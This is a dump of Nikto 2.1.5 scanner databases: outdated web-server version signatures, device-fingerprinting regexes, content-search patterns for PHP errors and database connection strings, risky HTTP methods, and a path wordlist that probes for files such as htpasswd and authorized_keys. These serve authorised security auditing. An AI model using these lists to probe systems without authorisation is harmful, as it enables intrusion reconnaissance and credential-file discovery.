"601074","TUNIX-httpscreen/","4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601075","TwistedWeb/","11.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601076","uhttpd/","1.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601077","UltiDevCassini/","2.1.4.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601078","WebMod/","0.48","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601079","xrl-thttpd/","2.25b08jan2011","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601080","PanWebServer/","2.4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601081","mod_put/","2.0.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601082","mod_qos/","10.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601083","ScriptLogic.Webserver/","8.0.0.440","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601084","Phusion Passenger/","3.0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601085","Zope/","(Zope/2.13.10","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601086","DMRND/","0.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601087","HelixMobileServer\/","14.3.0.268","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601088","JoostNRG/","0.0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601089","KDH\/","6100.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601090","mod_cntr\/","2.5.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601091","mod_nss\/","2.2.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601092","mod_spy\/","1.3.24","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601093","Mundu\/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601094","OmnitureDC\/","2.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601095","PPEngine\/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601096","SouthRiver\/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601097","Sun-ILOM-Web-Server\/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601098","uc-httpd\/","1.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601099","ymweb\/","1.5.34","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601100","ZhihuServer\/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601101","GlassFish Server Open Source Edition ","3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601102","JPMC","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601103","Rehwork Webserver ","v7.3b","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601104","TUNHS ","v.0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601105","TVP Portal ","3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601106","Viajeros2-","ECFE4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601107","Xtransform-","0.1.1-beta","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601108","tws","0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601109","IWS/","2.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601110","Moo/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601111","mod_apreq2-20090110/","2.8.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601112","mod_fastcgisa/","2.4.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601113","LMLmod_ssl/","2.8.31","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601114","37wan/","9.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601115","3fe/","2.7.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601116","ATS/","3.2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601117","AderleeWebPortal/","7.0.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601118","ArcWS/","4.0.20","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601119","AtyponWS/","7.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601120","BSWS/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601121","BWM/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601122","Become/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601123","BlueDragonServer/","7.1.0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601124","CHINACACHE/","CCN-BJ-3-57J","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601125","CPC/","2.2.17","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601126","CWS/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601127","ClaraPXWebv2.1/","FMAK","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601128","CloobFramework/","1.0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601129","Cnaws/","1.0.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601130","ComsenzWS/","1.0.00","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601131","DDWS/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601132","DHNWS/","2.15","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601133","DME/","2.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601134","DMS/","1.0.42","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601135","DZSERVER/","0.1.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601136","DayServletEngine/","4.1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601137","Dict/","2.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601138","FWS/","7.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601139","FlightAware/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601140","FreeFind/","8.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601141","FriendFeedServer/","0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601142","GNWS/","0.7.42","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601143","GWS-GRFE/","0.50","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601144","Geobytes-GeoSelect/","3.0.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601145","Haaretz/","0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601146","HavenServer/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601147","IAGR/","1.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601148","IBM_HTTP_SERVER/","1.3.28","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601149","Inyoka/","rev-5723","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601150","JWS/","2010","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601151","Jrun/","4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601152","KA/","0.03","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601153","KYOWS/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601154","Kerio_WebSTAR/","5.4.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601155","LMLmod_ssl/","2.8.31","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601156","LOVE/","4_3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601157","Lucy-HTTPd/","2.2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601158","MII-WSD/","1.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601159","MWS/","3.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601160","Meishi/","1.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601161","MobileAware-MF/","1.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601162","DHNWS/","2.15","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601163","GNWS/","0.7.42","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601164","NWS/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601165","OKWS/","3.1.4.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601166","Ocamlnet/","2.2.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601167","OmnitureAWS/","2.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601168","On-DemandRouter/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601169","PEARLWebshop/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601170","PPS/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601171","PhobyxCluster/","0.1.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601172","PipeBoost/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601173","Pizza/","4cheese","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601174","ROTOR/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601175","RWS/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601176","RapidbazLive/","0.0.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601177","RapidbazLiveFW/","0.07","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601178","Rediff/","2.0.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601179","Safe3WAF/","6.4.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601180","Smash/","W3TotalCache","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601181","SmugMug/","0.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601182","Snowball/","5.2a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601183","AderleeWebPortal/","7.0.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601184","TinyURL/","1.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601185","UPWS/","9.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601186","USF-11/","155","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601187","UWS/","0.17","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601188","UltraBrutalServer/","7.6112","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601189","VXS/","3.38","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601190","Smash/","W3TotalCache","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601191","W3TotalCache/","0.9.1.4b","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601192","WebGUI/","7.0.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601193","WebMatrixiDCHTTPServer/","8.0.53","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601194","YEEPAY-WBS/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601195","YJSWS/","0.8.53","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601196","YLS/","0.15","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601197","YServer/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601198","YWS/","2010","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601199","ZSWS/","2.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601200","ZendCore/","2.5.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601201","ZendServer/","5.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601202","alabout/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601203","aliBeacon/","3.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601204","barista/","3.3.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601205","ddspn/","0.8.34","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601206","emuch/","2010","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601207","ezot/","3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601208","follow5/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601209","gevent/","0.13","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601210","iPad/","8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601211","ibibo-WS/","2.2.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601212","iptoXGmbHHPC5/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601213","k\!/","45.8.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601214","kzserver/","1.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601215","magic_ponies/","2.718","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601216","mcdn/","1.alpha","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601217","mod_AliCookie/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601218","mod_chxj/","0.12.35","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601219","mod_cinemark/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601220","mod_defensible/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601221","mod_evasive/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601222","mod_fastcgisa/","2.4.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601223","mod_onsint/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601224","mod_ossl/","10.1.3.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601225","mod_rsp20/","rsp_plugins_v15.08-07-29","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601226","mod_security2/","2.5.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601227","mod_ucam_webauth/","1.4.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601228","mru_xml/","0.471","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601229","naukri.comnginx/","0.7.62","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601230","nfzmX/","700607","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601231","nginx-adamantsys/","0.7.67","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601232","nginx-catap/","0.8.7.528.179136c","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601233","proxy_xml/","0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601234","prxp_module/","1.12.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601235","psso_module/","0.9.14","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601236","pxg2_module/","0.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601237","qip.mail/","4.1.2120328.01.2011","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601238","rackcorpcdn/","1.0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601239","sws/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601240","uloztows/","1.26.19","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601241","xingyun/","0.8.88","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601242","yy365/","0.8.88","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601243","OwnServer","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601244","MobileAdmin/","7.0.15609","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601245","ClearSCADA/","6.71.4165.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601246","Zscaler/","3.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601247","comForteSWAPWebServer/","SLD_1055","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601248","corpweb/","3.3a.QEL4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601249","CouchDB/","1.0.2(ErlangOTP/R14B)","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601250","FreeBSDHost-WebServer/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601251","gunicorn/","0.14.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601252","ISYSSearchServer/","9.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601253","MLDonkey/","3.0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601254","mod_hive/","1.10","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601255","MX4J-HTTPD/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601256","Speedr/","0.8.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" nikto-2.1.5/databases/db_parked_strings0000644000000000000000000000165511737523030016707 0ustar rootroot#VERSION,2.000 ####################################################################### # Source: http://cirt.net # This file may only be distributed and used with the full Nikto package. # This file may not be used with any software product without written permission from CIRT, Inc. # (c) 2011 CIRT, Inc., All Rights Reserved. # # NOTE: By sending any database updates to CIRT, Inc., it is assumed that you # grant CIRT, Inc., the unlimited, non-exclusive right to reuse, modify and relicense the changes. ####################################################################### parked FREE # GoDaddy courtesy of GoDaddy\.com # GoDaddy \?epl= # domainsponsor.com Below are sponsored listings # Google doubleclick.net\/apps\/domainpark # Google Asia Registry # AsiaRegistry.com netsolhost # Network Solutions Sponsored Listings # Voodoo.com nikto-2.1.5/databases/db_multiple_index0000644000000000000000000000154411737523030016707 0ustar rootroot#VERSION,2.005 # $Id$ ####################################################################### # Source: http://cirt.net # This file may only be distributed and used with the full Nikto package. # This file may not be used with any software product without written permission from CIRT, Inc. # (c) 2009 CIRT, Inc., All Rights Reserved. # # NOTE: By sending any database updates to CIRT, Inc., it is assumed that you # grant CIRT, Inc., the unlimited, non-exclusive right to reuse, modify and relicense the changes. ####################################################################### # Notes: ####################################################################### "index" "index.php" "index.php3" "index.html" "index.htm" "index.shtml" "index.cfm" "index.cgi" "index.pl" "index.asp" "index.aspx" "default.asp" "default.aspx" "default.htm" "index.do" "index.jhtml" nikto-2.1.5/databases/db_embedded0000644000000000000000000000567011737523030015422 0ustar rootroot#VERSION,2.004 # $Id$ ####################################################################### # Source: http://cirt.net # This file may only be distributed and used with the full Nikto package. # This file may not be used with any software product without written permission from CIRT, Inc. # (c) 2007 CIRT, Inc., All Rights Reserved. # # NOTE: By sending any database updates to CIRT, Inc., it is assumed that you # grant CIRT, Inc., the unlimited, non-exclusive right to reuse, modify and relicense the changes. ####################################################################### # Notes: # NiktoDB 1.00 ####################################################################### "nikto_id","uri","match","model","message" "300000","/","^(.*office.xerox.com.*Model=)([A-Za-z0-9+]+)(&.*)$","$2","Host seems to be a Xerox printer, model:" "300001","/","^(.*HEAD_NODE.*)([Xx][Ee][Rr][Oo][Xx][ A-Z0-9a-z]+)(['\"]\);)","$2","Host seems to be a Xerox printer, model:" "300002","/","^([Pp][Hh][Aa][Ss][Ee][Rr][ A-Z0-9a-z]+)(<\/title>)","$1","Host seems to be a Xerox printer, model:" "300003","/","^(var prd=['\"])([XxWw][EeOo][Rr][OoKk][XxCc][ A-Z0-9a-z]+)(['\"];)","$2","Host seems to be a Xerox printer, model:" "300004","/hp/device/this.LCDispatcher","^(.*)([Hh][Pp] [Ll][Aa][Ss][Ee][Rr][Jj][Ee][Tt][ A-Z0-9a-z]+)(<\/title>.*)$","$2","Host seems to be an HP Laserjet printer, model:" "300005","/hp/device/this.LCDispatcher","^(.*<title>)([Hh][Pp] [Cc][Oo][Ll][Oo][Rr] [Ll][Aa][Ss][Ee][Rr][Jj][Ee][Tt][ A-Z0-9a-z]+)(<\/title>.*)$","$2","Host seems to be an HP Laserjet printer, model:" "300006","/hp/device/this.LCDispatcher","^([Hh][Pp] [Cc][Oo][Ll][Oo][Rr] [Ll][Aa][Ss][Ee][Rr][Jj][Ee][Tt][ A-Z0-9a-z]+)(<\/title>.*)$","$1","Host seems to be an HP Laserjet printer, model:" "300007","/hp/device/this.LCDispatcher","^([Hh][Pp] [Ll][Aa][Ss][Ee][Rr][Jj][Ee][Tt][ A-Z0-9a-z]+)(<\/title>.*)$","$1","Host seems to be an HP Laserjet printer, model:" "300008","/hmstat.htm","^(var spcs=\[['\"])([Ww][Oo][Rr][Kk][Cc][ A-Z0-9a-z]+)(['\"].*)$","$2","Host seems to be a Xerox printer, model:" "300009","/SoundBridgeStatus.html","(SoundBridge is running software version )([0-9.]*)$","$2","Host seems to be a Roku SoundBridge media device version:" "300010","/eng/start/StatPtrGen.htm","(^.*PrinterGen\[0\]; sData\[count\+\+\] \= \")([\S]*)(\";)","$2","Host seems to be a Kyocera printer, model:" "300011","/cab/top.shtml","(^.*<span class=\"product_name\">)([A-Z0-9]*)(<\/span><\/td>)","$2","Host seems to be a Canon printer, model:" "300012","/home.asp","(^.*<td><b class=\"is\"><center>)([\._\-A-Z0-9a-z\(\)\/ ]*)(<\/center><\/td><\/tr>)","$2","Host seems to be a Cyclades terminal server, version:" "300013","/","(^serverName=\")([A-Za-z0-9\-\.]+)(\";$)","$2","Host seems to be an HP iLO device, hostname:" "300014","/","(^<html><head><title>)(Remote Access Controller)($)","$2","Host seems to be a Dell" "300015","/","()(Sunny WebBox)()","$2","Host seems to be an SMA America " nikto-2.1.5/databases/db_content_search0000644000000000000000000000363211737523030016664 0ustar rootroot#VERSION,2.000 # $Id$ ####################################################################### # Source: http://cirt.net # This file may only be distributed and used with the full Nikto package. # This file may not be used with any software product without written permission from CIRT, Inc. # (c) 2010 CIRT, Inc., All Rights Reserved. # # NOTE: By sending any database updates to CIRT, Inc., it is assumed that you # grant CIRT, Inc., the unlimited, non-exclusive right to reuse, modify and relicense the changes. ####################################################################### # Notes: # These can be regular expressions, but will be eval'd case insensitive. # Since these are run after every page retrieved, we should try to keep these as fast # regular expressions as possible, and limited to only critical findings. ####################################################################### "nikto_id","osvdb","matchstring","message" "750000","3268","[iI]ndex [oO]f \/","Directory indexing found." "750001","0","Warning(?:<\/b>)?:\s+(?:include|require)(?:_once)?\(","PHP include error may indicate local or remote file inclusion is possible." "750002","0","failed to open stream: No such file or directory in (?:)?(?:[a-zA-Z]:\\|\/)","PHP include error reveals the full path to the web root." "750003","0","mysql_p?connect\(","Potential PHP MySQL database connection string found." "750004","0","pgp_p?connect\(","Potential PHP PostgreSQL database connection string found." "750005","0","sqlite_p?open\(","Potential PHP SQLite database connection string found." "750006","0","mssql_p?connect\(","Potential PHP MSSQL database connection string found." "750007","0","Call to undefined function.*\(\) in \/","PHP error reveals file system path." "750008","36099","FrameworkLog.xsl\"\\?>.*(?:[0-2]|3\.(?:[0-5]|6\.0\.(?:[0-4]|5(?:[0-3]|4[0-5]))))","McAfee Common Management Agent 3.6.0.546 and below contain multiple overflows." nikto-2.1.5/databases/db_httpoptions0000644000000000000000000000265111737523030016260 0ustar rootroot#VERSION,2.002 # $Id$ ####################################################################### # Source: http://cirt.net # This file may only be distributed and used with the full Nikto package. # This file may not be used with any software product without written permission from CIRT, Inc. # (c) 2009 CIRT, Inc., All Rights Reserved. # # NOTE: By sending any database updates to CIRT, Inc., it is assumed that you # grant CIRT, Inc., the unlimited, non-exclusive right to reuse, modify and relicense the changes. ####################################################################### # Notes: # NiktoDB 1.0 ####################################################################### "nikto_id","method","osvdb","message" "999976","DELETE","5646","HTTP method ('@TYPE@' Header): 'DELETE' may allow clients to remove files on the web server." "999978","PUT","397","HTTP method ('@TYPE@' Header): 'PUT' method could allow clients to save files on the web server." "999982","MOVE","5647","HTTP method ('@TYPE@' Header): 'MOVE' may allow clients to change file locations on the web server." "999983","CONNECT","0","HTTP method ('@TYPE@' Header): 'CONNECT' may allow server to proxy client requests." # WebDAV methods - "0" in nikto_id tells the code to treat it differently "0","PROPFIND","0","webdav" "0","PROPPATCH","0","webdav" "0","COPY","0","webdav" "0","LOCK","0","webdav" "0","UNLOCK","0","webdav" "0","SEARCH","0","webdav" "0","MKCOL","0","webdav" nikto-2.1.5/databases/db_dictionary0000644000000000000000000003553611775037160016050 0ustar rootroot#VERSION,1.0 # $Id: db_dictionary 773 2012-07-04 16:59:21Z jay.bahn $ ####################################################################### # Source: http://cirt.net # This file may only be distributed and used with the full Nikto package. # This file may not be used with any software product without written permission from CIRT, Inc. # (c) 2012 CIRT, Inc., All Rights Reserved. # # NOTE: By sending any database updates to CIRT, Inc., it is assumed that you # grant CIRT, Inc., the unlimited, non-exclusive right to reuse, modify and relicense the changes. ####################################################################### # Notes: ####################################################################### ADM ADMIN AggreSpy AppsLocalLogin AppsLogin BUILD CMS CVS DB DMSDump Documents Entries FCKeditor JMXSoapAdapter LICENSE MANIFEST.MF META-INF Makefile OA OAErrorDetailPage OA_HTML Program README Readme Recycled Root SQL SUNWmc SiteScope SiteServer Spy TEMP TMP TODO Thumbs.db WEB-INF WS_FTP XXX _ _adm _admin _common _conf _files _include _js _mem_bin _old _pages _private _res _source _src _test _vti_bin _vti_cnf _vti_pvt _vti_txt _www a aa aaa abc abc123 abcd abcd1234 about access access-log access-log.1 access.1 access_log access_log.1 accessibility account accounting accounts action actions active activex ad adclick add addpost addressbook adm admin admin_ adodb ads adv advanced advertise advertising affiliate affiliates agenda agent agents ajax album albums alert alerts alias aliases all alpha alumni amazon analog android announcement announcements anon anonymous ansi apac apache apexec api apis app appeal appeals append appl apple appliation applications apps apr arch archive archives array art article articles artwork ascii asdf asset assets atom attach attachment attachments attachs attic auction audio audit audits auth author authorized_keys authors auto automatic automation avatar avatars award awards awl awstats b b2b b2c back backdoor backend backup backups bandwidth bank banks banner banners bar base bash basic basket baskets batch baz bb bb-hist bb-histlog bboard bbs beans beehive benefits beta bfc big bigip bill billing binaries binary bins bio bios biz bkup blah blank blog blogger bloggers blogs board bofh book books boot bottom broken broker browse browser bs bsd bugs build buildr bulk bullet business button buttons buy buynow bypass ca cache cal calendar camel car card cards career careers cars cart carts cat catalog catalogs catalyst categories category catinfo cats ccbill cd cerificate cert certificate certificates certs cf cfcache cfdocs cfide cfusion cgi-bin cgi-bin2 cgi-home cgi-local cgi-pub cgi-script cgi-shl cgi-sys cgi-web cgi-win cgibin cgiwrap cgm-web change changed changes charge charges chat chats checkout child children chrome cisco cisweb citrix cl claim claims classes classified classifieds clear click clicks client clientaccesspolicy clients close closed closing club cluster clusters cmd cms cnf cnt cocoon code codec codecs codes cognos coldfusion columns com comment comments commerce commercial common communicator community compact company complaint complaints compliance component components compressed computer computers computing conference conferences configs console consumer contact contacts content contents contest contract contracts control controller controlpanel cookie cookies copies copy copyright core corp corpo corporate corrections count counter counters counts course courses cover cpadmin cpanel cr crack crash crashes create credits crm cron crons crontab crontabs crossdomain crypt crypto css current custom custom-log custom_log customer customers cute cv cxf czcmdcvt d daemon daily dana-na data database databases date day db_connect dba dbase dbman dbmodules dbutil dc dcforum de dealer debug decl declaration declarations decode decrypt decrypted decryption def default defaults definition definitions del delete deleted demo demos denied deny design desktop desktops detail details dev devel developer developers development device devices devs df dialog dialogs diff diffs digest digg dir directories directory dirs disabled disclaimer display django dl dm dm-config dms dms0 dns docebo dock docroot docs document documentation documents domain domains donate down download downloader downloads drop dropped drupal dummy dumps dvd dwr dynamic e e2fs ear ecommerce edge edit editor edits edp edu education ee effort efforts egress ejb element elements em email emails embed embedded emea employees employment empty emu emulator en en_US enc encode encrypt encrypted encyption eng engine english enterprise entertainment entries entry env environ environment error error-log error_log errors es esale esales etc europe event events evil evt ews ex example examples excalibur exchange exec explorer export ext ext2 extern external extras ezshopper f face faces faculty fail failure family faq faqs favorite favorites fcgi-bin feature features feed feedback feeds felix fetch field fields file fileadmin files filez finance financial find finger firefox firewall first fixed flags flash flow flows flv fn folder folders font fonts foo footer footers form formatting formmail forms forrest fortune forum forum1 forum2 forumdisplay forums forward foto foundation fr frame frames framework free freebsd friend friends frob frontend fs ftp fuck fuckoff fuckyou full fun func funcs function functions fusion fw g gadget gadgets galleries gallery game games ganglia garbage gateway gb geeklog general geronimo get getaccess getjobid gfx gid gitweb glimpse global globals glossary go goaway google government gprs grant grants graphics group groupcp groups gsm guest guestbook guests guide guides gump gwt h hack hacker hacking hackme hadoop hardcore hardware harmony head header headers health hello help helper helpers hi hidden hide high hipaa history hit hits hole home homepage hop horde hosting hosts hour hourly howto hp hr hta htbin htdoc htdocs htpasswd http httpd https httpuser hu hyper i ia ibm icat icon icons id idea ideas ids ie iframe ig ignore iisadmin iisadmpwd iissamples image imagefolio images imgs imp import important in inbound incl include includes incoming incubator index index1 index2 index_1 index_2 inetpub inetsrv inf info information ingress init inline input inquire 